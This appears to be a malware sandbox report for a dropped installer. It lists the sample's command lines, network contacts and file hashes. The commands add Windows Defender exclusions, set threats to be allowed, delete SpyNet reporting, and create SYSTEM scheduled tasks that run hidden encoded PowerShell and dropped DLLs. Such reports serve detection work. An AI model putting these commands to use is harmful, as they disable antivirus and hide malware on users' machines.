"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gMnpZxANI" /SC once /ST 09:17:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gMnpZxANI"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gMnpZxANI"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 04:38:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe\" UK /dKsite_idODx 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe UK /dKsite_idODx 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\SgRnOD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\vAdcuCY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\FRisDUp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\dbaZhxI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\CCvwivM.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\gyNrApt.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 06:07:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\pFeSwrry\ApFnkFq.dll\",#1 /twsite_idbXZ 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\pFeSwrry\ApFnkFq.dll",#1 /twsite_idbXZ 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\pFeSwrry\ApFnkFq.dll",#1 /twsite_idbXZ 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 147.111.86.104.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 235.110.86.104.in-addr.arpa udp
GB 172.217.169.46:443 clients2.google.com tcp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
GB 172.217.169.46:443 clients2.google.com tcp
US 44.239.141.158:80 api2.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe

MD5 ea99e72c1ac89aa9cc14178b1c46d50d
SHA1 60b896781f40e89106d0c76abd11c5b5d0832943
SHA256 9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA512 03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

memory/3868-14-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3056-20-0x00007FFCA6CF0000-0x00007FFCA77B2000-memory.dmp

memory/3056-21-0x0000020A66D80000-0x0000020A66D90000-memory.dmp

memory/3056-22-0x0000020A66D80000-0x0000020A66D90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z2rr0dpq.r5p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3056-29-0x0000020A66DC0000-0x0000020A66DE2000-memory.dmp

memory/3056-30-0x0000020A66D80000-0x0000020A66D90000-memory.dmp

memory/3056-33-0x00007FFCA6CF0000-0x00007FFCA77B2000-memory.dmp

memory/3156-38-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/772-41-0x0000000003F20000-0x0000000003F56000-memory.dmp

memory/772-42-0x0000000072E20000-0x00000000735D1000-memory.dmp

memory/772-43-0x0000000003F70000-0x0000000003F80000-memory.dmp

memory/772-44-0x00000000045B0000-0x0000000004BDA000-memory.dmp

memory/772-45-0x0000000004C80000-0x0000000004CA2000-memory.dmp

memory/772-46-0x0000000004E20000-0x0000000004E86000-memory.dmp

memory/772-47-0x0000000004E90000-0x0000000004EF6000-memory.dmp

memory/772-56-0x0000000004F00000-0x0000000005257000-memory.dmp

memory/772-57-0x00000000053D0000-0x00000000053EE000-memory.dmp

memory/772-58-0x0000000005410000-0x000000000545C000-memory.dmp

memory/772-61-0x0000000072E20000-0x00000000735D1000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

memory/3948-63-0x0000000072E20000-0x00000000735D1000-memory.dmp

memory/3948-64-0x00000000039F0000-0x0000000003A00000-memory.dmp

memory/3948-65-0x00000000039F0000-0x0000000003A00000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 63a8670106a7ad8512a3f6bf2d4bb398
SHA1 4c02b3c2b416e68390fd1b88ef36a4d1e86110a5
SHA256 40527fb1317d7a620a4ad590f6bf5c0f4cbe5f13332aa5e44b1d92b863948f17
SHA512 48be38b287c047b393cb72370e6e83fabfe6ec5e35dd0c535de6294ed2066b86f35f217d157e66ca041896a90d65f94210344982e40859db55366606ce8a57d6

memory/3948-76-0x0000000072E20000-0x00000000735D1000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

memory/2212-86-0x00007FFCA6CF0000-0x00007FFCA77B2000-memory.dmp

memory/2212-87-0x0000021CC1AB0000-0x0000021CC1AC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/2212-92-0x0000021CC1AB0000-0x0000021CC1AC0000-memory.dmp

memory/2212-94-0x00007FFCA6CF0000-0x00007FFCA77B2000-memory.dmp

memory/1908-100-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/1908-111-0x00000000018D0000-0x0000000001955000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 2e78ad0820e30077f4c6583f3f4784e8
SHA1 1b7a189a0b14fb0fe77823b757bff29865487da4
SHA256 e47e51c741f04fa242c42e131967678672f8478c20d68c14bd5a65a20d9f5214
SHA512 ff97a450363fde6c072760dcdc09c44a95962985889886381e91202ec5232726301a3de2ce77dc2f472b36cf6f7bf58a92c3be1c5f68b69b7ac4e98476d6b667

memory/1908-155-0x0000000002AC0000-0x0000000002B25000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 af5a6b277700c3d5f2b18476dc79bf88
SHA1 cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA256 3bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA512 27649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\yvWovCiVU\vAdcuCY.xml

MD5 1b4954742e04e3d6bc21d68a286347e6
SHA1 fb2875ab941ff19200a6dfbee0702f2f47949071
SHA256 be4ec302b77b7b1c72301e753c2522c4abc831a771eedd2220ec8eac49c4bbb6
SHA512 5ad2d356c7afa32b9740e0836ecaa3a2d2bfb494846a031cd176f30484d44a4ffde8ee9fec2b66e715bd480ea7ab1b509d499ffb9981744e42d368ea8e41b54d

C:\Program Files (x86)\LCifMpYymZWU2\FRisDUp.xml

MD5 a694b4f5eaa2c74d50ded8284fa46042
SHA1 d166a083c1b68712217c5d520a8272658eb20b93
SHA256 e9fbab40865b41a567daa9bd30d7ca8cc6fe504d6ddbcc9e372628e23b5e0e9a
SHA512 a0a99d6d82b7d0773c4a172d0dd86ab9495f05d5aad702874cb0ae5714aa6dd663834acbb84775323802e162d42c7be4bf5c739be3a1f1ec1e3ffcde341141ed

C:\ProgramData\WkkDuRgYrrqHXcVB\dbaZhxI.xml

MD5 cd084d2bccbe424c761cc7bfc9c0c72b
SHA1 579b7cf100bcefe5de1e913da340294f04816fd1
SHA256 fe2aa059340c4088415bf4eed5d6b3202246400156ebe3e201efbdfd7369596f
SHA512 8b742b8540a951031adef88708cfec777024f1e3978d6269c6619f70318fb821a5c3fe53cf1a2b73294592562026803075b8445e1b416ccbad355b5a736a0b5c

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\CCvwivM.xml

MD5 f26f5425fe9ba3f99d7586bbfe1f3c04
SHA1 022786231016e32b2cb081708704cdd3f9be87e5
SHA256 78eec3b4b9cc937c77898c70a5d60a8b63da9bea0931409428f1e29d1289059e
SHA512 0edbaad23eb705929fc0206b6602e62ab3266d5e185e1d5b509994bd11fb8ae9046bc602b7d5fd4c026b08426cac861eaf9f7ab98f445f956c60547c5764ef4a

C:\Program Files (x86)\mVqQIGUXDOgrC\gyNrApt.xml

MD5 d19bb7e7cb5f5970dcb820fa436445f6
SHA1 e32106cbe0e1202a7ba1efff66b3a328cf3c0fb1
SHA256 80f0e2cd390cd380fa7d95bc7cdfd1ffc7d3a05c0fd452a44e5c6f7c9e518415
SHA512 45a365d4d7d2668b8dc161b0c9d833bcda0766624ca9728d065192c33e6f212d15254a8abc1a42604c647244716101bd65d030fe6f75b9f55d99d488037e3bcc

C:\Windows\Temp\IzRZTwSZebgYVSAl\pFeSwrry\ApFnkFq.dll

MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
